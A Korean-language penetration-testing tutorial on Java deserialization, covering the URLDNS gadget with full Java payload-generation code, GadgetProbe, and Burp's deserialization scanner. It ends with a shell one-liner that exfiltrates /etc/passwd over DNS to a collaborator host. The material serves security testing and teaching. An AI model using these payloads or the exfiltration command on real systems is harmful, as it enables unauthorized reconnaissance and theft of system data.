이 클래스는 흥미로운 동작을 가지고 있습니다. 문서에서는 "두 호스트가 동일한 IP 주소로 해석될 수 있다면 호스트 이름이 동일하게 간주됩니다"라고 설명하고 있습니다.
그러면 URL 객체가 equals 또는 hashCode 함수 중 어떤 것을 호출하더라도 IP 주소를 가져오기 위해 DNS 요청이 전송됩니다.
URL 객체에서 hashCode 함수를 호출하는 것은 매우 쉽습니다. 이 객체를 역직렬화될 HashMap 안에 삽입하면 됩니다. 이것은 HashMap의 readObject 함수의 끝에서 이 코드가 실행되기 때문입니다:
privatevoidreadObject(java.io.ObjectInputStream s)throws IOException, ClassNotFoundException {[ ... ]for (int i =0; i < mappings; i++) {[ ... ]putVal(hash(key), key, value,false,false);}
그것은 HashMap 내의 모든 값과 함께 putVal를 실행할 것입니다. 그러나 더 중요한 것은 모든 값과 함께 hash를 호출하는 것입니다. 이것이 hash 함수의 코드입니다:
importjava.io.File;importjava.io.FileInputStream;importjava.io.FileOutputStream;importjava.io.IOException;importjava.io.ObjectInputStream;importjava.io.ObjectOutputStream;importjava.lang.reflect.Field;importjava.net.InetAddress;importjava.net.URLConnection;importjava.net.URLStreamHandler;importjava.util.HashMap;importjava.net.URL;publicclassURLDNS {publicstaticvoidGeneratePayload(Object instance,String file)throwsException {//Serialize the constructed payload and write it to the fileFile f =newFile(file);ObjectOutputStream out =newObjectOutputStream(new FileOutputStream(f));out.writeObject(instance);out.flush();out.close();}publicstaticvoidpayloadTest(String file) throwsException {//Read the written payload and deserialize itObjectInputStream in =newObjectInputStream(new FileInputStream(file));Object obj =in.readObject();System.out.println(obj);in.close();}publicstaticvoidmain(finalString[] args) throwsException {String url ="http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";HashMap ht =newHashMap(); // HashMap that will contain the URLURLStreamHandler handler =newSilentURLStreamHandler();URL u =newURL(null, url, handler); // URL to use as the Keyht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.// During the put above, the URL's hashCode is calculated and cached.// This resets that so the next time hashCode is called a DNS lookup will be triggered.finalField field =u.getClass().getDeclaredField("hashCode");field.setAccessible(true);field.set(u,-1);//Test the payloadsGeneratePayload(ht,"C:\\Users\\Public\\payload.serial");}}classSilentURLStreamHandlerextendsURLStreamHandler {protectedURLConnectionopenConnection(URL u) throwsIOException {returnnull;}protectedsynchronizedInetAddressgetHostAddress(URL u) {returnnull;}}
GadgetProbe는 서버의 Java 클래스에 일부 Java 클래스가 존재하는지 확인하여 해당 서버가 알려진 취약점에 취약한지 알 수 있습니다.
작동 방식
GadgetProbe는 이전 섹션의 DNS 페이로드를 사용하지만 DNS 쿼리를 실행하기 전에 임의의 클래스를 역직렬화하려고 합니다. 임의의 클래스가 존재하는 경우 DNS 쿼리가 전송되고 GadgetProbe는 이 클래스가 존재한다는 것을 알립니다. DNS 요청이 전송되지 않으면, 이는 임의의 클래스가 성공적으로 역직렬화되지 않았다는 것을 의미하므로 해당 클래스가 존재하지 않거나 직렬화/악용할 수 없는 것입니다.
이 스캐너는 Burp App Store (Extender)에서 다운로드할 수 있습니다.
확장 프로그램에는 수동 및 능동적인 기능이 있습니다.
수동
기본적으로 Java 직렬화 마법 바이트를 찾기 위해 보낸 모든 요청 및 응답을 수동으로 확인하고 발견된 경우 취약성 경고를 표시합니다:
능동적
수동 테스트
요청을 선택하고 마우스 오른쪽 단추를 클릭하여 Send request to DS - Manual Testing를 선택할 수 있습니다.
그런 다음 Deserialization Scanner Tab --> _Manual testing tab_에서 삽입 지점을 선택할 수 있습니다. 그리고 테스트를 실행할 수 있습니다 (사용된 인코딩에 따라 적절한 공격을 선택하십시오).
이것이 "수동 테스트"라고 불리지만, 꽤 자동화되어 있습니다. 웹 서버에 있는 라이브러리를 확인하고 취약한 라이브러리를 강조하기 위해 Java Sleeps, CPU 소비를 통한 sleeps, 또는 이전에 언급된 DNS를 사용하여 어떤 ysoserial 페이로드에 취약한지 자동으로 확인합니다.
악용
취약한 라이브러리를 식별하면 요청을 _Exploiting Tab_로 보낼 수 있습니다.
이 탭에서 다시 삽입 지점을 선택하고, 페이로드를 생성하려는 취약한 라이브러리와 명령을 작성한 다음 적절한 공격 버튼을 누르기만 하면 됩니다.
Java Deserialization DNS Exfil 정보
페이로드가 다음과 같은 것을 실행하도록 만드세요:
(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
